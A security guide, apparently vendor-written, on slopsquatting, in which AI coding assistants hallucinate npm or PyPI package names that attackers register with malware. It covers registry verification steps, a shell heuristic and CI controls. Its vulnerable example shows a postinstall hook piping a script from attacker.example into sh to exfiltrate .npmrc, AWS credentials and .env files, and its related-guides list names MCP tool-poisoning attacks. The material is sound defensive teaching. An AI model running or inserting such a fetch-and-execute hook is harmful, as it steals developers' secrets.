Hallucinated package names in AI-generated code — detect, prevent, and recover
AI coding assistants invent plausible-sounding package names that don't exist — and attackers pre-register those hallucinated names on npm and PyPI with malware. This guide shows the attack, the verification workflow, and the production controls that defend against it.
If you have ever pasted an `npm install` or `pip install` command from an AI coding assistant without checking the registry first, you have run the slopsquatting attack on yourself. AI models hallucinate package names confidently — Socket and Snyk's 2024-2025 research puts the hallucination rate between 5% and 20%, depending on language and prompt. Attackers monitor common LLM hallucinations and pre-register the names with malicious payloads. This guide walks through the attack, the one-minute verification workflow that defeats it, and the build-time controls that catch it before merge.
What it is
Slopsquatting is the supply-chain attack class where an AI coding assistant suggests a package that does not exist, an attacker has already registered the hallucinated name on the registry, and the developer copy-pastes the install command and pulls malware. It is distinct from typosquatting, which mimics an existing real package: slopsquatted names are invented from scratch by the model. Seth Larson's 2025 post coined the name for the class. The defense is a combination of name verification, build-time scanning, and a private mirror or allow-list for production.
Vulnerable example
# Vulnerable workflow — copy-paste from AI without verification
$ # User: "add a JWT helper for verifying tokens in Express"
$ # AI assistant: "Run: npm install jwt-helper-utils"
$ npm install jwt-helper-utils
# npm warn deprecated jwt-helper-utils@1.0.3 ...
# added 1 package in 4s
#
# postinstall hook fires:
# curl -s https://attacker.example/x | sh
# # exfiltrates ~/.npmrc + ~/.aws/credentials + .env
Fixed example
# Fixed workflow — verify every AI-suggested package against the registry
$ # AI assistant suggests: npm install jwt-helper-utils
# Step 1: Does the package actually exist?
$ npm view jwt-helper-utils
# npm error 404 'jwt-helper-utils@*' is not in this registry.
# -> Hallucinated. Reject the suggestion.
# If the package DOES exist, verify before installing:
# Step 2: Check first-publish date + downloads + repo
$ npm view jsonwebtoken time.created versions[0] repository.url
# 2012-09-19T16:21:51.621Z
# 0.1.0
# git+https://github.com/auth0/node-jsonwebtoken.git
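# Weekly downloads are not in the packument; npm's public downloads API has them
# (or check npmjs.com/package/<name>). Response abbreviated here:
$ curl -s https://api.npmjs.org/downloads/point/last-week/jsonwebtoken
# {"downloads": <weekly count>, "start": "...", "end": "...", "package": "jsonwebtoken"}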
# Step 3: Verify publisher matches the canonical maintainer
$ npm owner ls jsonwebtoken
# auth0 <devops@auth0.com>
# Step 4: Pin the verified package explicitly
$ npm install jsonwebtoken@^9.0.0 --save-exact
# Build-time control - Socket / Securie scan blocks PRs
# whose new dependencies are <30 days old + low downloads + no GitHub repo
How Securie catches it
Securie's dependency-vuln specialist runs on every PR. For each newly added package in package.json / requirements.txt / Gemfile, the specialist queries the registry for first-publish date, weekly download count, GitHub repo link, and publisher identity. Packages first published less than 30 days ago with low download counts and no linked GitHub repo trip the slopsquatting heuristic. The PR comment names the suspect package, lists the canonical alternative the AI was likely hallucinating, and proposes a one-tap rewrite of the install command. The verification runs in the sandbox, so a malicious post-install hook never executes on Securie infrastructure either.
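A minimal sketch of that heuristic as a standalone shell check, assuming npm's public downloads API at api.npmjs.org; the 30-day and 500-download thresholds are illustrative placeholders, not Securie's production values:

#!/usr/bin/env sh
# slop-check.sh <package> — illustrative slopsquatting check for one npm package.
set -eu
PKG="$1"

# 1. Existence: npm view exits non-zero on a 404, i.e. a hallucinated name.
if ! npm view "$PKG" name >/dev/null 2>&1; then
  echo "REJECT: $PKG is not in the registry (hallucinated name)"
  exit 1
fi

# 2. First-publish date from the packument's time.created field.
CREATED=$(npm view "$PKG" time.created)

# 3. Weekly downloads from npm's public downloads API.
WEEKLY=$(curl -s "https://api.npmjs.org/downloads/point/last-week/$PKG" \
  | grep -o '"downloads":[0-9]*' | cut -d: -f2 || true)

# 4. Linked repository, if any.
REPO=$(npm view "$PKG" repository.url 2>/dev/null || true)

echo "created=$CREATED weekly=${WEEKLY:-0} repo=${REPO:-none}"

# Heuristic: younger than ~30 days AND low downloads AND no repo link.
# (date -d is GNU date; adjust for BSD/macOS.)
AGE_DAYS=$(( ( $(date +%s) - $(date -d "$CREATED" +%s) ) / 86400 ))
if [ "$AGE_DAYS" -lt 30 ] && [ "${WEEKLY:-0}" -lt 500 ] && [ -z "${REPO:-}" ]; then
  echo "SUSPECT: $PKG trips the slopsquatting heuristic"
  exit 2
fi
echo "OK: $PKG passes the basic checks (still review the diff)"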
Checklist
- Every AI-suggested package is verified against the registry before installation (`npm view <name>` / `pip index versions <name>`)
- New dependencies in PRs are reviewed: first-publish date, weekly downloads, GitHub repo link, publisher identity
- Production builds use a private mirror or allow-list registry, not the public npm/PyPI directly (see the `.npmrc` sketch after this list)
- package.json / requirements.txt / Gemfile pin exact versions for security-critical dependencies
- Lockfile is committed and reviewed in PRs (package-lock.json, yarn.lock, poetry.lock, Pipfile.lock)
- Post-install / post-merge scripts are disabled in CI for untrusted PRs (`--ignore-scripts`; see the sketch after this list)
- Secrets and credentials are not readable by post-install hooks (use isolated CI runners)
- Dependency review is automated on every PR (Securie / Socket / GitHub Dependency Review)
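Two of the checklist controls, the private mirror and the script ban, can be expressed as a project-level .npmrc. A minimal sketch, with a placeholder mirror URL:

# .npmrc (project-level controls; the mirror URL is a placeholder for your own)
# Route installs through a private allow-list mirror, not public npm
registry=https://npm-mirror.internal.example/
# Never run dependency install/postinstall scripts
ignore-scripts=true
# Write exact versions into package.json on install
save-exact=true

For untrusted PRs, `npm ci --ignore-scripts` in the CI job enforces the same script ban per run even if the file is edited.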
FAQ
How often does this actually happen?
Socket and Snyk research from 2024-2025 measured 5-20% of AI-suggested package names as hallucinated, with rates higher for Python (PyPI's namespace is fragmented) than for npm. The first proven malicious slopsquatting registrations on npm and PyPI were reported through 2024-2025; counts in the wild grew through 2026.
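On the Python side, the same existence check works against PyPI. A minimal sketch (pip index is still marked experimental; output abbreviated):

$ pip index versions jwt-helper-utils
# ERROR: No matching distribution found for jwt-helper-utils
# -> Hallucinated. Reject the suggestion.
$ curl -s -o /dev/null -w '%{http_code}\n' https://pypi.org/pypi/jwt-helper-utils/json
# 404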
Doesn't `npm audit` catch this?
No. `npm audit` checks installed packages against a known-vulnerable database. Slopsquatting packages are zero-day attacks — they're not in any vuln DB until reported, and by then your secrets are already exfiltrated. The defense is preventive (verify before install) plus build-time scanning (Securie / Socket).
What if the AI gives me a real but malicious typosquat?
Same defense applies — verify first-publish date, weekly downloads, publisher, and GitHub repo. Typosquats usually fail one or more of those checks (a fresh npm package called `lodahs` with 5 downloads/week and no repo is not the real lodash).
Is this only an AI problem?
Slopsquatting specifically is AI-driven — the attacker exploits the AI's confidence in inventing names. The broader registry-poisoning problem (typosquats, dependency-confusion, malicious transitives) predates AI, but AI dramatically widened the surface by inventing fresh names every prompt.
Related guides
Vibe-coded apps inherit thousands of transitive dependencies and the AI assistant invents fresh ones every prompt. This guide walks through the dependency-scanning stack for an AI-built app: what to run, what to block in CI, and how to handle slopsquatting + typosquatting + dependency confusion.
Cursor / Lovable / Bolt / Copilot wrote your code. It compiles, it works, you shipped it. Before you do the same thing tomorrow, here are the 5 security patterns AI-generated code gets wrong, with the visual signature for each so you can spot them in code review.
Model Context Protocol went 0 → 200,000+ servers in 9 months. The April 2026 Anthropic RCE flaw + the Invariant Labs tool-poisoning class disclosures forced every MCP-using team to harden their server hygiene. This guide walks the four attack classes (unknown-server smuggle, fingerprint drift, tool smuggle, scope escalation) and the operator-authored TOML catalog that closes them.
The rug-pull pattern: an MCP server ships a safe v1 catalog at install time, then mutates to a v2 catalog (with attacker-controlled tools) once it's running in your trust boundary. Invariant Labs disclosed this class in 2025; the Apr 2026 Anthropic RCE incident exploited a related design flaw. This guide ships the fingerprint-pinning + signature-verification defense.